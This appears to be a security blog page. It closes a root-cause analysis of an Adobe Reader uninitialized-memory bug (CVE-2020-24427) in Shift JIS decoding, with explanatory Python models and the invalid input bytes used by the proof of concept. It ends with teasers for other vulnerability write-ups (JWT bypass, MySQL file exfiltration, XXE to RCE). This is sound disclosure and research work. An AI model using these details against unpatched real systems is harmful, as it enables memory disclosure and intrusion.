First, Host2UCS() calls MultiByteToWideChar() with the flag MB_ERR_INVALID_CHARS set to get the size of the buffer required for decoding. This flag makes MultiByteToWideChar() fail if it encounters an invalid byte sequence, so the call fails with our invalid input data. Next, it calls MultiByteToWideChar() again, but without this flag, which means the function successfully returns to convert_mb_to_unicode().
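The strict-then-lenient size query has a close analogue in Python's codec error handlers, shown below as a rough model. errors="strict" plays the role of MB_ERR_INVALID_CHARS and errors="replace" the role of the call without the flag. The name size_query() is hypothetical, and Python's replacement behavior is not guaranteed to match what Windows produces for the same bytes.

```python
from typing import Tuple

POC_BYTES = b"\xfc\x23"  # invalid Shift JIS prefix used by the proof of concept


def size_query(mb: bytes, codec: str = "shift_jis") -> Tuple[int, bool]:
    """Return (utf16_code_units, strict_ok): try strict decoding, then lenient."""
    try:
        strict = mb.decode(codec, errors="strict")
        return len(strict.encode("utf-16-le")) // 2, True
    except UnicodeDecodeError:
        # Retry without validation, mirroring the second MultiByteToWideChar() call.
        lenient = mb.decode(codec, errors="replace")
        return len(lenient.encode("utf-16-le")) // 2, False
```

With POC_BYTES the strict attempt fails but the query still reports a non-zero size, so the caller goes on to allocate a buffer for data that will never be decoded strictly.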

When the first call to Host2UCS() returns, convert_mb_to_unicode() allocates the buffer and calls Host2UCS() again for the actual decoding. In this call, Host2UCS() will try to decode the data with MultiByteToWideChar() again with the flag MB_ERR_INVALID_CHARS set, and this will fail as we have seen earlier.

This time it will not call MultiByteToWideChar() again, because u_str_size is not zero and the if condition is not met. This makes Adobe Reader fall back to its own decoder:

Initially, it calls PDEncConvAcquire() to allocate a buffer for holding the context data required for decoding. Then it calls PDEncConvSetEncToUCS(), which looks up the character map for the codec. However, this call always fails and returns zero, which means that the call to PDEncConvXLateString() is never reached and the function returns with u_str uninitialized.
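Putting the two passes together, the flow that leaves u_str uninitialized can be simulated in Python. This is a toy model under stated assumptions: STALE stands in for whatever the allocator left in the buffer, fallback_decoder() stands in for the PDEncConv* path and simply fails, and the failure return value of host2ucs() is a guess, since the text does not show how the real function reports it.

```python
STALE = b"SECRET-HEAP-DATA"  # stand-in for leftover heap contents


def fallback_decoder(mb: bytes, out: bytearray) -> bool:
    """Stand-in for Adobe's own decoder, which fails for this input."""
    return False


def host2ucs(mb: bytes, out, out_size: int) -> int:
    try:
        text = mb.decode("shift_jis")  # strict, like MB_ERR_INVALID_CHARS
    except UnicodeDecodeError:
        if out_size == 0:
            # Size query: the lenient retry is allowed and succeeds.
            return len(mb.decode("shift_jis", errors="replace").encode("utf-16-le"))
        fallback_decoder(mb, out)      # fails, so nothing is written to out
        return 0                       # assumed failure value; the caller ignores it
    data = text.encode("utf-16-le")
    if out is not None:
        out[:len(data)] = data
    return len(data)


def convert_mb_to_unicode(mb: bytes) -> bytes:
    size = host2ucs(mb, None, 0)                                # pass 1: size only
    buf = bytearray((STALE * (size // len(STALE) + 1))[:size])  # unzeroed "allocation"
    host2ucs(mb, buf, size)                                     # pass 2: result unchecked
    return bytes(buf)
```

Valid input overwrites the whole buffer, while the proof-of-concept bytes leave the stale contents untouched and return them to the caller as if they were decoded text.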

The failing function, PDEncConvSetEncToUCS(), initially maps the codepage number to the name of the corresponding Adobe Reader character map in the global array CJK_to_UC2_charmaps. For example, Shift JIS maps to 90ms-RKSJ-UCS2:

Once the character map name is resolved, it passes the character map name to sub_6079CCB6():

The function sub_6079CCB6() calls PDReadCMapResource() with the character map name as an argument inside an exception handler.

The function PDReadCMapResource() is where the exception is triggered. This function fetches a relatively large data structure stored in the current thread's local storage area:

It checks for a dictionary within this structure and creates one if it does not exist. Then, it checks for an STL-like vector and creates it too if it does not exist. The dictionary stores the decoder data, and its entries are looked up by the ASAtom of the character map name (90ms-RKSJ-UCS2 in our case). The vector stores the names of the character maps as ASAtoms.

The code that follows is where the exception is triggered:

It looks up the dictionary using the character map name. If the character map is not in the dictionary, it is not expected to be in the vector either; otherwise an exception is triggered. In our case, the character map 90ms-RKSJ-UCS2 (atom 0x1366) is not in the dictionary, so ASDictionaryFind() returns NULL. However, if we dump the vector, we find it there, and this is what causes the exception.
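The consistency check between the dictionary and the vector can be modeled as a small cache class. This is a hypothetical sketch: only the "missing from the dictionary but present in the vector raises" rule comes from the analysis above, while the class, the exception type, and what happens on the normal path are assumptions made to keep the example runnable.

```python
class CMapLookupError(Exception):
    """Raised when the name list and the dictionary disagree."""


class CMapCache:
    def __init__(self):
        self.decoders = {}  # character map name -> decoder data
        self.names = []     # character map names recorded so far

    def read_cmap_resource(self, name: str):
        decoder = self.decoders.get(name)
        if decoder is None:
            if name in self.names:
                # Name recorded but no decoder stored: inconsistent state.
                raise CMapLookupError(name)
            # Assumed normal path: record the name and store placeholder data.
            self.names.append(name)
            decoder = self.decoders[name] = object()
        return decoder
```

A cache whose names list already contains 90ms-RKSJ-UCS2 while decoders does not reproduces the unexpected state: every lookup of that name raises.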

Conclusion

In conclusion, we've demonstrated how we analyzed and root-caused the vulnerability in detail by reversing the code.
Encodings are generally hard to implement for developers. The constant need for encoders and encodings makes them a ripe area for vulnerability research as every format has its own encoders.

That’s it for today, hope you enjoyed the analysis. As always, happy hunting!


Disclosure Timeline

10 – 8 – 2020 – Vulnerability reported to vendor.
31 – 10 – 2020 – Vendor confirms the vulnerability.
3 – 11 – 2020 – Vendor issues CVE-2020-24427 for the vulnerability.

Reversing embedded device bootloader (U-Boot) - p.1

8 March 2022 at 14:20
This blog post is not intended to be a “101” ARM firmware reverse-engineering tutorial or a guide to attacking a specific IoT device. The goal is to share our experience and, why not, perhaps save you some precious hours and headaches. “Bootrom” In this two-post series, we will share an analysis of some aspects of reversing a low-level binary. Why? Well, we have to admit we struggled a bit to collect the information needed to build basic knowledge of this topic, and the material we found was often not comprehensive enough, or took many aspects for granted.

QilingLab – Release

21 July 2021 at 15:00
Two years ago Ross Marks created the FridaLab challenge as a playground to test and learn how to use the Frida dynamic instrumentation toolkit. At that time, I solved FridaLab and wrote a writeup about it explaining the main APIs and usages of Frida for Android. This helped others to start getting familiar with it and as a reference when developing Frida scripts. After trying Qiling for some time I decided to follow Ross Marks’ steps and to develop a basic playground challenge to make use of the main Qiling features and I obviously called it QilingLab.

Hunting for bugs in Telegram's animated stickers remote attack surface

16 February 2021 at 08:00
Introduction At the end of October ‘19 I was skimming the Telegram’s android app code, learning about the technologies in use and looking for potentially interesting features. Just a few months earlier, Telegram had introduced the animated stickers; after reading the blogpost I wondered how they worked under-the-hood and if they created a new image format for it, then forgot about it. Back to the skimming, I stumbled upon the rlottie folder and started googling.

Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory. Routine checks –> Auth bypass During a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party Oauth service the web application used JWT tokens to track sessions and privileges.

Sometimes they come back: exfiltration through MySQL and CVE-2020-11579

28 July 2020 at 14:18
Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. Like many other vulnerabilities, after reading about this quite-unknown attack technique (1, 2), I could not wait to find a vulnerable software where to practice such unusual dynamic.

1-click RCE on Keybase

27 April 2020 at 18:00
TL;DR Keybase clients allowed to send links in chats with arbitrary schemes and arbitrary display text. On Windows it was possible to send an apparently harmless link which, when clicked, could execute arbitrary commands on the victim’s system. Introduction Keybase is a chat, file sharing, git, * platform, similar to Slack, but with a security in-depth approach. *Everything* on Keybase is encrypted, allowing you to relax while syncing your private files on the cloud.

NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by EspressIF. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

24 October 2019 at 17:22
TL;DR LSP4XML, the library used to parse XML files in VSCode-XML, Eclipse’s wildwebdeveloper, theia-xml and more, was affected by an XXE (CVE-2019-18213) which led to RCE (CVE-2019-18212) exploitable by just opening a malicious XML file. Introduction 2019 seems to be XXE’s year: during the latest Penetration Tests we successfully exploited a fair amount of XXEs, an example being https://www.shielder.com/blog/exploit-apache-solr-through-opencms/. It all started during a web application penetration test, while I was trying to exploit a blind XXE with zi0black.